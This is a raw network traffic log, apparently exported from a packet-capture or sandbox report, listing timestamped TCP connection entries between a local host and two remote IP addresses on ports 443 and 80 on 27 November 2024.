                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.056401968 CET49801443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.056451082 CET4434980113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.056480885 CET4434980113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.056559086 CET49801443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.058660030 CET49806443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.058708906 CET4434980613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.058772087 CET49806443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.058876038 CET49806443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.058886051 CET4434980613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.105983973 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.154098988 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.288867950 CET4434980313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.289721966 CET49803443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.289736032 CET4434980313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.290164948 CET49803443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.290170908 CET4434980313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.504977942 CET4434980213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.504992008 CET4434980213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.505055904 CET49802443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.505074024 CET4434980213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.505373955 CET49802443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.505383015 CET4434980213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.505415916 CET49802443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.505562067 CET4434980213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.505590916 CET4434980213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.505660057 CET49802443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.507997990 CET49807443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.508057117 CET4434980713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.508240938 CET49807443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.508272886 CET49807443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.508279085 CET4434980713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.739475012 CET4434980313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.743654013 CET4434980313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.743761063 CET49803443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.745843887 CET49803443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.745843887 CET49803443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.745868921 CET4434980313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.745881081 CET4434980313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.748663902 CET49808443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.748691082 CET4434980813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.748769045 CET49808443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.748971939 CET49808443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.748992920 CET4434980813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.986785889 CET4434980413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.987310886 CET49804443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.987327099 CET4434980413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.987831116 CET49804443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:02.987837076 CET4434980413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:03.425277948 CET4434980413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:03.428602934 CET4434980413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:03.428658962 CET49804443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:03.428745985 CET49804443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:03.428755999 CET4434980413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:03.428770065 CET49804443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:03.428776026 CET4434980413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:03.431998968 CET49809443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:03.432027102 CET4434980913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:03.432089090 CET49809443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:03.432236910 CET49809443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:03.432243109 CET4434980913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:03.906630039 CET4434980613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:03.907114029 CET49806443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:03.907131910 CET4434980613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:03.907577038 CET49806443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:03.907581091 CET4434980613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.295794964 CET4434980713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.296633005 CET49807443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.296662092 CET4434980713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.297091961 CET49807443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.297097921 CET4434980713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.300339937 CET4434980513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.300606012 CET49805443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.300623894 CET4434980513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.300940990 CET49805443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.300946951 CET4434980513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.362627983 CET4434980613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.365746975 CET4434980613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.365832090 CET49806443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.365880013 CET49806443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.365880013 CET49806443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.365897894 CET4434980613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.365906954 CET4434980613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.368673086 CET49810443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.368712902 CET4434981013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.368787050 CET49810443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.368944883 CET49810443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.368957996 CET4434981013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.547993898 CET4434980813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.549067020 CET49808443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.549101114 CET4434980813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.549782038 CET49808443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.549788952 CET4434980813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.739522934 CET4434980713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.743603945 CET4434980713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.743706942 CET49807443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.743807077 CET49807443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.743829966 CET4434980713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.743841887 CET49807443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.743849039 CET4434980713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.745096922 CET4434980513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.746670961 CET49811443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.746705055 CET4434981113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.746784925 CET49811443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.746951103 CET49811443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.746961117 CET4434981113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.748696089 CET4434980513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.748755932 CET49805443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.748814106 CET49805443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.748835087 CET4434980513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.748841047 CET49805443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.748846054 CET4434980513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.751012087 CET49812443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.751035929 CET4434981213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.751127958 CET49812443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.751297951 CET49812443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.751317024 CET4434981213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:04.999212980 CET4434980813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.002465963 CET4434980813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.002542019 CET49808443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.002599001 CET49808443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.002599001 CET49808443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.002624035 CET4434980813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.002636909 CET4434980813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.005469084 CET49813443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.005521059 CET4434981313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.005606890 CET49813443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.005779028 CET49813443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.005791903 CET4434981313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.227564096 CET4434980913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.228032112 CET49809443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.228049040 CET4434980913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.228492975 CET49809443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.228497982 CET4434980913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.671268940 CET4434980913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.671360970 CET4434980913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.671463966 CET49809443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.672528028 CET49809443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.672528028 CET49809443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.672549009 CET4434980913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.672557116 CET4434980913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.675211906 CET49814443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.675261974 CET4434981413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.675405025 CET49814443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.675527096 CET49814443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:05.675543070 CET4434981413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.227140903 CET4434981013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.279114008 CET49810443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.334918976 CET49810443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.334943056 CET4434981013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.335398912 CET49810443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.335411072 CET4434981013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.610424995 CET4434981213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.612241030 CET4434981113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.627011061 CET49812443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.627043009 CET4434981213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.627584934 CET49812443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.627593040 CET4434981213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.628030062 CET49811443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.628042936 CET4434981113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.629075050 CET49811443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.629081011 CET4434981113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.686297894 CET4434981013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.689332008 CET4434981013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.689387083 CET49810443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.689951897 CET49810443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.689951897 CET49810443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.689970970 CET4434981013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.689981937 CET4434981013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.693654060 CET49815443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.693687916 CET4434981513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.693802118 CET49815443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.693979025 CET49815443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.693988085 CET4434981513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.736160994 CET4434981313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.736644983 CET49813443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.736654997 CET4434981313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.737029076 CET49813443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:06.737034082 CET4434981313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.067328930 CET4434981113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.070609093 CET4434981113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.070688963 CET49811443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.070755005 CET49811443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.070755005 CET49811443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.070771933 CET4434981113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.070780039 CET4434981113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.073489904 CET49816443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.073540926 CET4434981613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.073932886 CET49816443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.074078083 CET49816443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.074093103 CET4434981613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.084549904 CET4434981213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.087488890 CET4434981213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.087548971 CET49812443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.087594986 CET49812443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.087615967 CET4434981213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.087621927 CET49812443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.087627888 CET4434981213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.090033054 CET49817443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.090070009 CET4434981713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.090298891 CET49817443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.090446949 CET49817443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.090456009 CET4434981713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.171120882 CET4434981313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.174592972 CET4434981313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.174649954 CET4434981313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.174649954 CET49813443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.174709082 CET49813443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.174760103 CET49813443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.174760103 CET49813443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.174776077 CET4434981313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.174791098 CET4434981313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.177623987 CET49818443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.177664042 CET4434981813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.177730083 CET49818443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.177890062 CET49818443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.177900076 CET4434981813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.530652046 CET4434981413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.531152010 CET49814443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.531196117 CET4434981413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.531708956 CET49814443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.531714916 CET4434981413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.983866930 CET4434981413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.987706900 CET4434981413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.987798929 CET49814443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.987839937 CET49814443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.987860918 CET4434981413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.987873077 CET49814443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.987879038 CET4434981413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.990778923 CET49819443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.990823984 CET4434981913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.990895987 CET49819443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.991131067 CET49819443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:07.991142988 CET4434981913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.423515081 CET4434981513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.433186054 CET49815443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.433212996 CET4434981513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.434770107 CET49815443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.434779882 CET4434981513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.858041048 CET4434981513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.858290911 CET4434981513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.858350992 CET4434981513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.858434916 CET49815443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.858434916 CET49815443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.865806103 CET4434981613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.872550964 CET4434981713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.919719934 CET49816443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.921345949 CET49817443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.949068069 CET49815443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.949109077 CET4434981513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.949199915 CET49815443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.949208021 CET4434981513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.950493097 CET49816443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.950556040 CET4434981613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.957756996 CET49816443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.957789898 CET4434981613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.961445093 CET49817443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.961469889 CET4434981713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.965213060 CET49817443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.965226889 CET4434981713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.967444897 CET4434981813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.975229025 CET49818443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.975258112 CET4434981813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.980170012 CET49818443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:08.980185032 CET4434981813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:09.018556118 CET49820443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:09.018610001 CET4434982013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:09.018714905 CET49820443192.168.2.1013.107.246.43
